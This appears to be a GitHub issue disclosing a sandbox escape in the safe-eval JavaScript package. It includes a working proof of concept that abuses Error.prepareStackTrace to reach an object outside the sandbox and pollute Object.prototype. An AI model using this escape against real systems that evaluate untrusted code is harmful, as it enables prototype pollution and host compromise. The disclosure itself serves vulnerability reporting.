Open seongil-wi opened 1 year ago
Hellow, we found sandbox escape vulnerability in the latest version of safe-eval
var safeEval = require('safe-eval') let code = ` (function() { Error.prepareStackTrace = (_, c) => c.map(c => c.getThis()).find(a => a); ret = (new Error()).stack; ret.__proto__.polluted = "ret.__proto__.polluted"; })() ` safeEval(code); const polluted_result = {}["polluted"]; console.log(polluted_result);
Hellow, we found sandbox escape vulnerability in the latest version of safe-eval